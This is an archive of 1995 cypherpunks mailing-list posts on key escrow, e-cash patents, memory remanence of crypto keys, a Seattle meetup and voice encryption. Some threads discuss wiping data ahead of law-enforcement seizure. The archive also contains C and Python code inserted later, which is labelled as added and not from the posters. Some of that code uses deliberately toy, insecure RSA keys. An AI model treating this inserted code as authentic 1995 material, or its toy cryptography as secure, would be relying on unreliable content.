Anonymous (unrecoverable error)

   ----- Transcript of session follows -----
... while talking to utopia.hacktic.nl.:
>>> RCPT To:
<<< 550 ... User unknown
550 Anonymous ...
User unknown
451 cypherpunks at toad.com... reply: read error from toad.com.

   ----- Original message follows -----
To: Anonymous
Subject: Re: Emergency File Wipe Algorithim
From: Black Unicorn
Date: Mon, 4 Sep 1995 17:35:07 -0400 (EDT)
cc: mail2news at utopia.hacktic.nl, cypherpunks at toad.com
In-Reply-To: <199509041725.TAA12314 at utopia.hacktic.nl>

From joelm at eskimo.com Mon Sep 4 14:59:35 1995
From: joelm at eskimo.com (Joel McNamara)
Date: Mon, 4 Sep 95 14:59:35 PDT
Subject: Seattle area Cypherpunks
Message-ID: <199509042159.OAA15140@mail.eskimo.com>

With the Labor Day weekend/vacation season almost over and a variety of projects completed, I'm going to attempt to jump-start Cypherpunk activities in the Seattle area (the Seattle Cypherpunks sub-list appears to have withered away, so delete this if you're outside the Pacific Northwest).
The first order of business is to get an idea of how many people would be interested in meeting some evening, likely toward the end of September. Send me e-mail (please don't reply to the list) with a time and geographic preference as to location. I'm on the Eastside, so will be slightly biased in finding an appropriate meeting place in the Bellevue/Redmond area, unless persuaded otherwise.

Also, let me know if you're interested in discussing (or presenting) any specific crypto/privacy/ecash-related topics in a very informal setting. Aside from key signing and general face-to-face networking, I would like to have a few set items on the agenda. Any suggestions welcomed.

Based on your responses, I'll do all of the running around and organizational type activities, and follow-up with e-mail and a general announcement to the main list when arrangements are finalized.

This is an opportunity to get away from your keyboards and meet other folks who share your interests. Hope to see you later this month.

Joel McNamara
joelm at eskimo.com - http://www.eskimo.com/~joelm for PGP key
Thomas Jefferson used strong crypto, shouldn't you?

From cwe at Csli.Stanford.EDU Mon Sep 4 15:17:31 1995
From: cwe at Csli.Stanford.EDU (Christian Wettergren)
Date: Mon, 4 Sep 95 15:17:31 PDT
Subject: Emergency File Wipe Algorithim
In-Reply-To:
Message-ID: <199509042217.PAA17498@Csli.Stanford.EDU>

Anon writes>
> When a running computer is seized in some sort of law enforcement
> raid, what are the chances someone would think to backup the
> contents of a RAMDISK drive prior to powering it down?

Also note the recent posting on sci.crypt by Peter Gutmann about being able to recover data from DRAMs and SRAMs after powerdown. It hits cryptokeys really bad. I suppose this is really academic at the current stage, but that might change.
/Christian

From liberty at gate.net Mon Sep 4 15:25:40 1995
From: liberty at gate.net (Jim Ray)
Date: Mon, 4 Sep 95 15:25:40 PDT
Subject: e$: More fun with cash: Senate Bill 307
Message-ID: <199509042224.SAA05533@tequesta.gate.net>

-----BEGIN PGP SIGNED MESSAGE-----

Black Unicorn wrote:
>
>Actually it was aimed at the rumors that Iran had been printing U.S.
>currency on a large scale and using it abroad. When I say Iran, I mean
>a government backed program. New York Times had an article on the matter
>last year. With enough interest I will try to Lexis/Nexus it.

I had heard that it was the Colombians, branching out from the cocaine business with those fancy new copy machines, which are supposed to be able to duplicate the blue & red threads in US currency paper.
JMR

Regards, Jim Ray

See, when the GOVERNMENT spends money, it creates jobs; whereas when the money is left in the hands of TAXPAYERS, God only knows what they do with it. Bake it into pies, probably. Anything to avoid creating jobs. -- Dave Barry
------------------------------------------------------------------------
PGP key Fingerprint 51 5D A2 C3 92 2C 56 BE 53 2D 9C A1 B3 50 C9 C8
Key id. # E9BD6D35 James M. Ray
------------------------------------------------------------------------
Support Phil! email zldf at clark.net or see http://www.netresponse.com/zldf
________________________________________________________________________

From thad at hammerhead.com Mon Sep 4 15:43:30 1995
From: thad at hammerhead.com (Thaddeus J.
Beier)
Date: Mon, 4 Sep 95 15:43:30 PDT
Subject: Encrypted desktop videoconferencing
Message-ID: <199509042240.PAA01994@hammerhead.com>

A friend of mine works for a large input-device company, and they are looking to get into the desktop videoconferencing business. Their current business is extremely competitive on price, and they'd like to do something in desktop videoconferencing that would distinguish them from everybody else. Naturally, I suggested cryptography.

I have always thought that the biggest problem introducing crypto to phone conversations was the large amount of cpu speed and software complexity to digitize the audio; that adding the crypto code is relatively minor. Certainly RC4 and IDEA for instance, run very fast. In videoconferencing applications, this audio compression is already being done, so adding the crypto should be almost free. Well, except for licensing costs.

I'd really like to use Diffie-Hellman to negotiate a key. Does anyone know how much it would cost to license that from PKP? I'd expect that there would be a one time fee, plus a per-copy-sold fee.

Does anybody know - and if so, can they say - if anybody else has added or is adding cryptography to their videoconferencing systems? It seems like such a killer app that I must be overlooking something.
thad
--
Thaddeus Beier           email: thad at hammerhead.com
Technology Development   vox: (408) 286-3376
Hammerhead Productions   fax: (408) 292-8624

From unicorn at access.digex.net Mon Sep 4 15:48:00 1995
From: unicorn at access.digex.net (Black Unicorn)
Date: Mon, 4 Sep 95 15:48:00 PDT
Subject: e$: More fun with cash: Senate Bill 307
In-Reply-To: <199509042224.SAA05533@tequesta.gate.net>
Message-ID:

On Mon, 4 Sep 1995, Jim Ray wrote:

> Date: Mon, 04 Sep 1995 18:22:43 -0400
> From: Jim Ray
> To: cypherpunks at toad.com
> Subject: Re: e$: More fun with cash: Senate Bill 307
>
> -----BEGIN PGP SIGNED MESSAGE-----
>
> Black Unicorn wrote:
> >
> >
> >Actually it was aimed at the rumors that Iran had been printing U.S.
> >currency on a large scale and using it abroad. When I say Iran, I mean
> >a government backed program. New York Times had an article on the matter
> >last year. With enough interest I will try to Lexis/Nexus it.
>
> I had heard that it was the Colombians, branching out from the cocaine
> business with those fancy new copy machines, which are supposed to be
> able to duplicate the blue & red threads in US currency paper.
> JMR

I've not heard anything about this. Any sources?

>
> Regards, Jim Ray
>
> See, when the GOVERNMENT spends money, it creates jobs; whereas
> when the money is left in the hands of TAXPAYERS, God only knows
> what they do with it. Bake it into pies, probably. Anything to
> avoid creating jobs. -- Dave Barry
> ------------------------------------------------------------------------
> PGP key Fingerprint 51 5D A2 C3 92 2C 56 BE 53 2D 9C A1 B3 50 C9 C8
> Key id. # E9BD6D35 James M.
Ray
> ------------------------------------------------------------------------
> Support Phil! email zldf at clark.net or see http://www.netresponse.com/zldf
> ________________________________________________________________________
>
>

00B9289C28DC0E55 no one becomes utterly wicked all at once - the power of knowledge lies in its use
E16D5378B81E1C96 seek the truth without end, speaks under the rose - important!
*New Key Information* - Finger for key revocation and latest key update.

From rrothenb at ic.sunysb.edu Mon Sep 4 15:50:01 1995
From: rrothenb at ic.sunysb.edu (Deranged Mutant)
Date: Mon, 4 Sep 95 15:50:01 PDT
Subject: pseudonyms & list health
In-Reply-To:
Message-ID: <199509042248.SAA08649@csws5.ic.sunysb.edu>

Tim wrote:
> At 6:13 AM 9/4/95, Futplex wrote:
> >Deranged Mutant writes:
> >> My worry is about abuse. One would prefer to save endorsements and find
> >> a way to remove thumbs-downs... also how to prevent one from overdoing a
> >> thumbs-up or -down certification for a person (either to inflate or
> >> deflate a reputation).
> >
> >A few nuisance lawsuits from people who were given thumbs-downs might do the
> >trick, as with employment recommendations in the U.S. :[
>
> A good point that deserves further comment. Employers have taken to _saying
> nothing_ about past employees, for fear of lawsuits by disgruntled job
> seekers. So much for free speech, courtesy of the American legal system.

As a somehow related note, my experience with some past jobs is that in some circumstances the employee turnover rate is high enough that a manager will give a neutral or good rating simply because they have no experience with a previous employee who clearly did not deserve a good rating. Something similar could happen with mailing lists... hardly anyone can remember when a 'newbie' posted to a list a few years ago, irregardless of whether a person is still worth a certain rating after a time.
Then again, with a lot of material being archived, it might be easier in some circumstances to review a person's contributions to a list rather than rely on a rating... or maybe send a trusted rater to research an author on the 'net for you rather than maintain a huge database of ratings that will need some form of interpretation. Then again, (as Tim and others noted) there's always killfiles and manual glossing over of threads, etc.

> But as we can't change the litigious nature of American society (and maybe
> European society--I don't know), the emphasis ought to be on digital
> systems and reputations by pseudonyms.

Litigating in a society of pseudonyms may have its own problems anyway... (imagine suing a trusted friend of yours who prefers to give you much needed criticisms through a pseudonym so as to protect the friendship... one example off the top of my head)... How can a 'nym be held legally accountable as a non-'nym?

-Rob

From hallam at w3.org Mon Sep 4 16:11:55 1995
From: hallam at w3.org (hallam at w3.org)
Date: Mon, 4 Sep 95 16:11:55 PDT
Subject: Emergency File Wipe Algorithim
In-Reply-To: <199509042217.PAA17498@Csli.Stanford.EDU>
Message-ID: <9509042310.AA27080@zorch.w3.org>

>Also note the recent posting on sci.crypt by Peter Gutmann about being
>able to recover data from DRAMs and SRAMs after powerdown. It hits
>cryptokeys really bad.

If the power is cycled as opposed to turned off only then a memory self test program will probably erase the data.

Phill

From cwe at Csli.Stanford.EDU Mon Sep 4 16:14:32 1995
From: cwe at Csli.Stanford.EDU (Christian Wettergren)
Date: Mon, 4 Sep 95 16:14:32 PDT
Subject: Emergency File Wipe Algorithim
In-Reply-To:
Message-ID: <199509042314.QAA18360@Csli.Stanford.EDU>

Someone proposed that one could wipe the memory before power-down, for example during 1 second or something like that. Unfortunately, that won't help, unless I misread the paper.
It is effectively the same as if the key had been stored in the cell for 1 second less, nothing else.

The only way I can see how to avoid generating "imprints" of more or less static data is to make them non-static. Start circulating them around. One way that springs to mind for keys is to do something like inverting the meaning of the key every x milliseconds. Like this:

/* posted as pseudo code; the timer and the cipher are stubbed in here so it compiles */
#include <signal.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/time.h>
#include <unistd.h>
#define KEYSIZE 16
#define ONES 1

static unsigned char master_key[KEYSIZE];      /* held either as-is or bit-inverted */
static volatile sig_atomic_t meaning = 0;       /* ONES: master_key is currently inverted */
static volatile sig_atomic_t using_key = 0;     /* crude lock between flipem() and encryption() */

static void invert(unsigned char *key)
{
    for (int i = 0; i < KEYSIZE; i++) key[i] = (unsigned char)~key[i];
}

/* SIGALRM handler, every 100 ms: no static bit pattern stays in the key's cells for long */
static void flipem(int sig)
{
    (void)sig;
    if (using_key)           /* encryption() is reading the key: skip this tick */
        return;              /* (risk of never being able to flipem() if it is always busy) */
    using_key = 1;           /* some kind of semaphored section */
    invert(master_key);
    meaning = !meaning;
    using_key = 0;
}

/* stand-in for the real cipher (called encrypt() above; unistd.h already declares one) */
static void cipher(const unsigned char *in, unsigned char *out, size_t len, const unsigned char *key)
{
    for (size_t i = 0; i < len; i++) out[i] = in[i] ^ key[i % KEYSIZE];
}

void encryption(const unsigned char *input, unsigned char *output, size_t len)
{
    unsigned char real_key[KEYSIZE];           /* must be on the stack, short-lived */
    volatile unsigned char *wipe = real_key;   /* volatile: the compiler may not drop the stores */
    using_key = 1;                             /* keep flipem() out while we copy */
    memcpy(real_key, master_key, KEYSIZE);
    if (meaning == ONES)
        invert(real_key);                      /* recovering real content */
    using_key = 0;
    cipher(input, output, len, real_key);
    for (int i = 0; i < KEYSIZE; i++)          /* write_random_key(): so the "real" key */
        wipe[i] = (unsigned char)rand();       /* doesn't become imprinted as well */
}

int main(void)
{
    struct itimerval tv = { { 0, 100000 }, { 0, 100000 } };  /* 100 ms period */
    unsigned char in[32] = "some plaintext", out[32];
    if (fread(master_key, 1, KEYSIZE, stdin) != KEYSIZE)      /* input_from_keyboard(master_key) */
        return 1;
    signal(SIGALRM, flipem);
    setitimer(ITIMER_REAL, &tv, NULL);                        /* calls flipem every 100 ms */
    for (int i = 0; i < 5; i++) {                             /* main_loop(), occasionally using encryption() */
        sleep(1);
        encryption(in, out, sizeof in);
    }
    return 0;
}

Don't care about the plaintext in the above. Nor stack content very much. Nor about coding style.

From liberty at gate.net Mon Sep 4 16:25:30 1995
From: liberty at gate.net (Jim Ray)
Date: Mon, 4 Sep 95 16:25:30 PDT
Subject: e$: More fun with cash: Senate Bill 307
Message-ID: <199509042324.TAA65697@tequesta.gate.net>

-----BEGIN PGP SIGNED MESSAGE-----

Black Unicorn wrote:
>>
>>
>> > [I said]
>>
>> I had heard that it was the Colombians, branching out from the cocaine
>> business with those fancy new copy machines, which are supposed to be
>> able to duplicate the blue & red threads in US currency paper.
>> JMR
>
>I've not heard anything about this. Any sources?

Sorry, just my vague memory of a Miami Herald article from a while back.
Perhaps someone else on the list is more familiar with good copy-machines. Around here, the Colombian cartels are depicted as very powerful, with easy payoffs to the highest levels of their country's political and judicial systems, and access to technology such as Motorola's encrypted walkie-talkie (supposedly a restricted-sale item). Of course, US politicians are completely immune to bribes from drug cartels.
JMR

Regards, Jim Ray

See, when the GOVERNMENT spends money, it creates jobs; whereas when the money is left in the hands of TAXPAYERS, God only knows what they do with it. Bake it into pies, probably. Anything to avoid creating jobs. -- Dave Barry
------------------------------------------------------------------------
PGP key Fingerprint 51 5D A2 C3 92 2C 56 BE 53 2D 9C A1 B3 50 C9 C8
Key id. # E9BD6D35 James M. Ray
------------------------------------------------------------------------
Support Phil! email zldf at clark.net or see http://www.netresponse.com/zldf
________________________________________________________________________

From bplib at nic.wat.hookup.net Mon Sep 4 16:27:48 1995
From: bplib at nic.wat.hookup.net (bplib at nic.wat.hookup.net)
Date: Mon, 4 Sep 95 16:27:48 PDT
Subject: VCRPLUS Huffman code
Message-ID: <199509042328.TAA02676@nic.wat.hookup.net>

I too would be interested in the VCRPlus code. Has anyone broken it?
Tim Philp

From cwe at Csli.Stanford.EDU Mon Sep 4 16:38:57 1995
From: cwe at Csli.Stanford.EDU (Christian Wettergren)
Date: Mon, 4 Sep 95 16:38:57 PDT
Subject: Emergency File Wipe Algorithim
In-Reply-To: <199509042314.QAA18360@Csli.Stanford.EDU>
Message-ID: <199509042338.QAA18782@Csli.Stanford.EDU>

FYI.
Repost from sci.crypt. It seems as if it has expired at some places.

/Christian

From cman at communities.com Mon Sep 4 16:45:35 1995
From: cman at communities.com (Douglas Barnes)
Date: Mon, 4 Sep 95 16:45:35 PDT
Subject: Identity Agnostic Online Cash
Message-ID:

An early draft of a paper based on my comments at the Crypto '95 rump session is available at:

http://www.communities.com/paper/agnostic.html

Here's the abstract:

Abstract: One of the unique aspects of Chaum's blind signature scheme for anonymous transactions is that it is practiced entirely by the side that wants to be anonymous. In a customer-bank relationship, the customer's software practices the technology, not the bank's. Chaum's patent on blind signatures cites as prior art a non-anonymous signature scheme that differs significantly only in steps taken by the "customer" side. An open standard for electronic cash would then allow a bank or other cash issuer to remain agnostic with respect to customer's software blinding or not blinding. Since the bank's software would be practicing technology cited as prior art by Chaum in his patent, and would have a substantial non-infringing use, I argue that the bank would not need to license Chaum's patents, provided the bank itself only provided non-blinding customer software.

Here's a review of the talk by Hal Finney... :-)

One of the more interesting talks I thought was from cypherpunk Doug Barnes, on "identity agnostic" electronic cash. This is basically an idea for creating a Magic-Money-type electronic cash server without violating Chaum's cash patent. What you do is to run the server and publish a spec it will follow. All the server does is do an RSA signature on the raw data it receives and decrement the user's account accordingly. The user has a choice of doing blinding or not on the signature.
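The server/customer split that the abstract and Hal's review describe, as an added example in Python (not code from Doug Barnes' paper or from anyone on the list): the issuer does nothing but a raw RSA signature and a balance decrement, and two customer programs, one blinding and one not, talk to that same interface. It assumes a toy RSA key built from two Mersenne primes so the numbers stay readable; that key size is for illustration only.

```python
import hashlib
import secrets
from math import gcd

# Toy RSA key for the cash issuer, constructed here: two Mersenne primes, a
# ~92-bit modulus. Readable, NOT secure; a real issuer uses >= 2048 bits.
P, Q = (1 << 31) - 1, (1 << 61) - 1
N, E = P * Q, 65537
D = pow(E, -1, (P - 1) * (Q - 1))


class AgnosticServer:
    """The bank side: a raw RSA signature on whatever integer it receives,
    one coin charged per signature. It never learns whether the value was
    blinded; that decision lives entirely in the customer's software."""

    def __init__(self, accounts):
        self.accounts = dict(accounts)   # account -> coins still withdrawable
        self.seen = []                   # everything the bank could log

    def sign(self, account, x):
        if not 0 < x < N:
            raise ValueError("value out of range")
        if self.accounts.get(account, 0) <= 0:
            raise ValueError("insufficient funds")
        self.accounts[account] -= 1
        self.seen.append(x)
        return pow(x, D, N)              # s = x^d mod n, nothing else


def coin_value(serial):
    """Hash the serial into the RSA domain; signing a hash rather than the
    serial itself keeps the bank from being handed a chosen message."""
    return int.from_bytes(hashlib.sha256(serial).digest(), "big") % N


def verify_coin(serial, sig):
    """Any merchant holding the public key (N, E) can check a coin."""
    return pow(sig, E, N) == coin_value(serial)


def withdraw_plain(server, account, serial):
    """Non-blinding customer software: the bank sees the coin it signs."""
    return server.sign(account, coin_value(serial))


def withdraw_blinded(server, account, serial):
    """Chaum-style customer software against the very same server API:
    multiply by r^E before signing, divide by r afterwards."""
    m = coin_value(serial)
    while True:
        r = secrets.randbelow(N - 2) + 2
        if gcd(r, N) == 1:
            break
    s_blind = server.sign(account, (m * pow(r, E, N)) % N)
    # (m * r^E)^D == m^D * r (mod N), so removing r leaves the bank's
    # signature on m, a value the bank has never seen.
    return (s_blind * pow(r, -1, N)) % N


def bank_can_link(server, serial):
    """Could the bank tie a coin presented for deposit back to a withdrawal?"""
    return coin_value(serial) in server.seen
```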
Chaum's patent covers the blinding, so if the user wants to do that he should be sure to license the patent or live somewhere it doesn't apply (or ignore it if he figures he's too small potatoes for them to care about). But the server isn't responsible for checking all this. It just does RSA sigs, which is prior art as far as Chaum's patent goes. Users can blind or not, it doesn't care. It is "identity agnostic" as Doug says.

The implication is that with an RSA license you could run this kind of bank (online cash) and ignore Chaum's patents, while a horde of end users violate the patents but take safety in numbers and get anonymity. Lawyers like to go after big targets but the servers aren't violating anything.

From hallam at w3.org Mon Sep 4 16:48:00 1995
From: hallam at w3.org (hallam at w3.org)
Date: Mon, 4 Sep 95 16:48:00 PDT
Subject: VCRPLUS Huffman code
In-Reply-To: <199509042328.TAA02676@nic.wat.hookup.net>
Message-ID: <9509042347.AA27160@zorch.w3.org>

>I too would be interested in the VCRPlus code. Has anyone broken it?

Challenge time! C'mon - can do this by exhaustive search probably :-)

There is a lot of stuff in the satellite tv newsgroups on this topic. I think it's an item well worth cracking.

Phill

From sdw at lig.net Mon Sep 4 17:08:23 1995
From: sdw at lig.net (Stephen D. Williams)
Date: Mon, 4 Sep 95 17:08:23 PDT
Subject: VCRPLUS Huffman code
In-Reply-To: <199509042328.TAA02676@nic.wat.hookup.net>
Message-ID:

It was broken, and I might have the reference in my archives... If I get time I'll find it.

> I too would be interested in the VCRPlus code. Has anyone broken it?
> Tim Philp
>
>

--
Stephen D.
Williams 25Feb1965 VW,OH (FBI ID)
sdw at lig.net http://www.lig.net/sdw
Consultant, Vienna,VA Mar95- 703-918-1491W 43392 Wayside Cir.,Ashburn, VA 22011
OO/Unix/Comm/NN ICBM/GPS: 39 02 37N, 77 29 16W home, 38 54 04N, 77 15 56W
Pres.: Concinnous Consulting,Inc.;SDW Systems;Local Internet Gateway Co.;28May95

From stewarts at ix.netcom.com Mon Sep 4 17:23:23 1995
From: stewarts at ix.netcom.com (Bill Stewart)
Date: Mon, 4 Sep 95 17:23:23 PDT
Subject: Acceptable NIS&T restrictions
Message-ID: <199509050019.RAA27055@ix9.ix.netcom.com>

At 12:54 PM 9/4/95 -0400, Pat Farrell commented on the NIST's latest proposals for their September meeting on export controls and software with built-in government access to keys (GAK). I'll generally use the terms GAK or master keying rather than escrow, since escrow is a legal term that implies both the willingness of both parties to use it, and also that the escrowed material be delivered only when certain criteria are satisfied, which is out of the scope of almost any proposals I've seen labelling themselves "key escrow", particularly the Clipper system. Material with > and indentation are from the NIST paper; material with just > and 0-1 spaces is Pat's.

64 bits of keyspace is of course hopelessly inadequate for financial transactions - crackerboxes have been designed that allow very rapid breaking of single-DES or short-key RC4, and a useful platform needs to accommodate high-value transactions such as customers' access to stockbrokers as well as more limited-value transactions such as credit cards where a $1000 cracking cost makes crime not pay well. The Administration argues that the limitation makes up for the possibility that users may find ways to evade GAK; but users can already do that now.

>    "Avoiding multiple encryption -- How can the product be
>    designed so as to prevent doubling (or tripling, etc.) the
>    key space of the algorithm?"
>CME has been suggesting DES | TRAN | DES | TRAN | DES
>for years.
Can they really _avoid_ (i.e. prevent) this? (CME is Carl Ellison at TIS; tran is a simple transposition system.)

Sure - if the software always tacks in master keys any time it does a symmetric-key encryption, and won't/can't decrypt without it, then DES+GAK | DES+GAK | DES+GAK is just as vulnerable to someone with the master key as single DES+GAK - it just takes three separate phases of key forfeiture to decode. (Yes, I left out the tran phase; anybody going to that much work is using something other than the built-in encryption, at which point they might as well use non-government-approved encryption themselves.)

Does it triple the key space? For people without the master key, yes, though maybe they get some known plaintext. For people with the master key, it depends on your definitions, and maybe _they_ put in some known plaintext that they don't give outsiders, but it probably doesn't lose them much.

>    "Disabling the key escrow mechanism -- How can products be
>    made resistant to alteration that would disable or
>    circumvent the key escrow mechanism? How can the "static
>    patch" problem be avoided? How can this be tested?"
>
>This is easy in hardware. Is it even possible in software?

Probably. Consider the sort of master-key system where part of the session key isn't transmitted - maybe you do something like hash the user portion of the session key with the hash of the program and feed it to the KeyMaster's public key to get the session key. By the time you put all of that into Pretty Good PatchAround, you might as well just use PGP.

>    "Practical Key Access -- How can mechanisms be designed so
>    that repeated involvement of escrow agents is not required
>    for decryption for multiple files/messages during the
>    specified access period?"
>At least this has a chance of being real. We need to have a suggestion
>for expiration times for the escrowed keys. This was a huge problem with the
>initial Clipper.
Information can't be destroyed, only forgotten, so time-limitation is tough. What you can do is limit the scope of messages that can be decrypted by one trip to the keymaster - the Feds are looking for some mechanism so that any limits like this won't require multiple trips for one bunch of wiretapping.

>Is there a reasonable middle ground between long term keys such
>as PGP uses, and the ephemeral keys of a D-H exchange?

What's reasonable? Some potential models for a PGPng would be

- Use separate keys for signatures/keysigning and messages, so you could change your message key frequently while leaving your signature (or at least key-signature) key stable. (This tends to need an extra layer in the web of trust, since you now have two tiers for yourself, but no biggie.)

- Diffie-Hellman kind of mechanism to encrypt the keys, with published g, p, g**x mod p, x changing frequently, RSA or DSS or whatever to sign the keyparts - this works better with a more interactive key negotiation so you can use a new x every time (e.g. request directly from the user, though that's difficult for email, or a keyserver that maintains a set of keys to be doled out.)

>    "Certified escrow agents -- Can products be designed so that
>    only escrow agents certified by the U.S. government (domestic,
>    or under suitable arrangements, foreign) are utilized?
>    What should be the criteria for an acceptable U.S. escrow agent?"

The technical and political questions are quite different. Technically, you could have the software require a hierarchical-style certificate for the key-master keys with a US Government CA wired in. It's not totally foolproof - patching the CA is easy unless you've got some sort of checksum on the software. But it's a start, and it's simple enough that either the US could authorize separate versions for France or certify the French government's key-master agency.
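Bill's second PGPng model above (a stable key that only signs, a Diffie-Hellman exponent that changes every time) is also the negotiation Thaddeus Beier asked about for videoconferencing; as an added example that is not code from either post, here it is in Python. It assumes the 1024-bit MODP group of RFC 2409 (generator 2) for the exchange and toy-sized RSA signing keys constructed inline so the numbers stay readable; nothing here is a production key size.

```python
import hashlib
import secrets

# 1024-bit MODP group from RFC 2409 ("Second Oakley Group"), generator 2.
P = int(
    "FFFFFFFFFFFFFFFFC90FDAA22168C234C4C6628B80DC1CD129024E088A67CC74"
    "020BBEA63B139B22514A08798E3404DDEF9519B3CD3A431B302B0A6DF25F1437"
    "4FE1356D6D51C245E485B576625E7EC6F44C42E9A637ED6B0BFF5CB6F406B7ED"
    "EE386BFB5A899FA5AE9F24117C4B1FE649286651ECE65381FFFFFFFFFFFFFFFF", 16)
G = 2


def toy_rsa_key(p, q, e=65537):
    """(n, e, d) from two primes. TOY sizes are used below: readable, not secure."""
    return p * q, e, pow(e, -1, (p - 1) * (q - 1))


def rsa_sign(key, data):
    n, _, d = key
    h = int.from_bytes(hashlib.sha256(data).digest(), "big") % n
    return pow(h, d, n)


def rsa_verify(n, e, data, sig):
    h = int.from_bytes(hashlib.sha256(data).digest(), "big") % n
    return pow(sig, e, n) == h


def share_bytes(name, gx):
    """What gets signed: the sender's name bound to its DH public value."""
    return name.encode() + b"|" + gx.to_bytes(128, "big")


class Endpoint:
    """One conferencing endpoint: a long-term signing key that stays stable
    (the thing a web of trust vouches for) plus a fresh DH exponent per call,
    so a later compromise of the signing key does not expose old sessions."""

    def __init__(self, name, signing_key):
        self.name = name
        self.key = signing_key
        self.public = signing_key[:2]          # (n, e), published like a PGP key
        self.x = None

    def offer(self):
        """Pick a new x for this call and sign g^x together with our name."""
        self.x = secrets.randbelow(P - 3) + 2
        gx = pow(G, self.x, P)
        return self.name, gx, rsa_sign(self.key, share_bytes(self.name, gx))

    def accept(self, peer_offer, peer_public):
        """Check the peer's share before using it: a man in the middle can
        substitute his own g^y but cannot sign it with the peer's key."""
        if self.x is None:
            raise RuntimeError("call offer() first")
        name, gy, sig = peer_offer
        if not 1 < gy < P - 1:
            raise ValueError("degenerate DH value")
        if not rsa_verify(*peer_public, share_bytes(name, gy), sig):
            raise ValueError("share not signed by " + name)
        secret = pow(gy, self.x, P)
        # Hash the shared secret rather than using its raw bits as key material.
        return hashlib.sha256(b"session|" + secret.to_bytes(128, "big")).digest()[:16]


def negotiate(a, b):
    """Both sides exchange signed shares; returns the two derived session keys."""
    offer_a, offer_b = a.offer(), b.offer()
    return a.accept(offer_b, b.public), b.accept(offer_a, a.public)
```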
Also, there's a need for escrow/keymaster agents to be negotiable per-message - since escrow inherently requires the trust of all parties, and probably contractual agreements as well, and government-enforced keymastering may require satisfying multiple governments, parties will presumably have different lists of acceptable keymasters.

>We all know that Tim's Flakey Key Escrow Service is most likely not
>"an acceptable US escrow agent." But since CKE is a good thing, what
>are the characteristics of an acceptable service to us?

As far as the political criteria go, I believe the traditional formulation is along the lines of "I am not now, nor have I ever been, a member of...." :-)

Establishing criteria is difficult, and depends on whether the whole system will be defined by laws passed by Congress or only by organizational policy; there are also issues of control between the Commerce Department, NIST, NSA, and the State Department.

For Commercial Key Escrow, or commercial key-backup services, the criteria are "whoever can be trusted to provide the services the customers want". In this case, of course, the service most customers want is to be left alone, or, failing that, to have the government's Master Key system provide minimal risk to the security of the actual transactions - 64 bit keys are not enough security for any high-valued financial transactions, though they may suffice for credit cards.

One required characteristic would appear to be either sufficiently deep pockets to collect judgements for violations of trust or a sufficiently high reputation that violations of trust are not expected.
Most of the commercial market for key escrow or backup services fits into three categories - backups for the owner/sender of a file (which they can provide themselves, using techniques like PGP's Encrypt-to-Self option, or file backups with secret-sharing), acknowledgements of transmission (signed hashes would do), and dispute-resolution issues (verifying the contents of a message which may require information from both parties or ephemeral session key information.) Most can be provided by the kind of services currently provided by companies like bonding agencies, emergency backup and offsite storage companies, etc.

#---
# Thanks; Bill
# Bill Stewart, Freelance Information Architect, stewarts at ix.netcom.com
# Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281
#---

From stewarts at ix.netcom.com Mon Sep 4 17:23:55 1995
From: stewarts at ix.netcom.com (Bill Stewart)
Date: Mon, 4 Sep 95 17:23:55 PDT
Subject: Basic Public key algorithms.
Message-ID: <199509050020.RAA27203@ix9.ix.netcom.com>

At 01:01 PM 9/2/95 CDT, droelke at rdxsunhost.aud.alcatel.com (Daniel R. Oelke) wrote:
>After doing quite a bit of poking around, I am somewhat discouraged
>in my attempts to find a simple *pure* public key encryption method,
>without a lot of other stuff wrapped around it.

Pure public-key is usually not very useful, since it's rather slow for encrypting big messages by itself. PKP has the patents to all public-key systems until mid-1997, and for RSA until some time like 2001, and Schnorr for longer. Unfortunately, RSAREF (except for one version where they slipped) requires non-commercial users to limit themselves to the published interface or get explicit permission, and the published interface always throws in DES with a random key for encryption. Since you're talking embedded systems, you're probably commercial and high enough volume that the cost for licensing RSA is probably low enough.
>What I need is to encrypt between 45 and 55 bits of information
>using a public key algorithm in an embedded environment.

45-55 bits may be tough, depending on the constraints of your environment - most public-key systems need 768-1024 bits of key to be reasonably secure, and need to send an output field at least that long to be decodable. If that's not a problem, you've got some choices. For instance, you could use Diffie-Hellman to create a shared secret, and just XOR that with your material (have the workstation generate a master x, g, and p, and store g**x in your embedded system; choose a random y each time, and send g**y mod p and the first |M| bits of (g**xy mod p) xor M.) To do that, you need to store g**x, g, and p, possibly in ROM, and enough code to do modular exponentiation and random number generation; hopefully your system will have some kind of quasi-physical source of randomness.

#---
# Thanks; Bill
# Bill Stewart, Freelance Information Architect, stewarts at ix.netcom.com
# Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281
#---

From microbody at wirepool.ruhr.de Mon Sep 4 17:45:40 1995
From: microbody at wirepool.ruhr.de (Matthias Jordan)
Date: Mon, 4 Sep 95 17:45:40 PDT
Subject: Q: PGPfone where
Message-ID: <5tEkFnD0J2B@blank.wirepool.ruhr.de>

Hello, guys! I just want to know where to get PGPfone outside the USA. Ciao!

/\/\icroBod\/   |\?/|  SoziBits <---- Attacks Drugs Weapons
 / \______/     | I |  Falcons on the Net RAF ETA KGB LSD XTC BND

From monty.harder at famend.com Mon Sep 4 17:47:53 1995
From: monty.harder at famend.com (MONTY HARDER)
Date: Mon, 4 Sep 95 17:47:53 PDT
Subject: maximizing cryptographic return
Message-ID: <8B072A1.00030003E8.uuout@famend.com>

VZ> this list are aware of the idea that good encryption is often used
VZ> to send a low-bandwidth session key, which is then used to encrypt
VZ> that session using a less sophisticated but less computationally-demanding
VZ> algorithm.
VZ> hence you seem to have good security at a computational
VZ> price that is less than encrypting everything with the secure protocol.

Why must this process be limited to two levels?

VZ> I wonder if some very cheap algorithms, in terms of computation time,
VZ> could be used for the "on the fly" encryption of the voice using those
VZ> bits. would XOR with the pad be totally out of line?

The RSA could be used by the caller to precompute the session key to send to the receiver. The session key (IDEA or whatever) could be used to send "subsession keys" which are actually parameters for the PRNGs (use at least two, with different periodic characteristics, and XOR them together) that create the pad for your XOR. The subsession size should be chosen so that very little "clearvoice" is transmitted in each subsession. Perhaps a bit of randomness is in order here, as well. Along with the PRNG parms, a length field, within certain absolute limits. Now the spook doesn't even know where one subsession ends, and the next begins.

Add to this the use of a (lossy?) compression engine that can run with little power, and a simple microcontroller (or several cheaper ones in parallel - I can see one master for the session and subsession key management and several slaves to handle the on-the-fly (en)(de)cryption itself) should be able to do the job, fitting the subsession key exchange in right along with the cyphervoice. Ideally, we could have a box that could pull its power from the phone line, and take touch-tone control inputs.

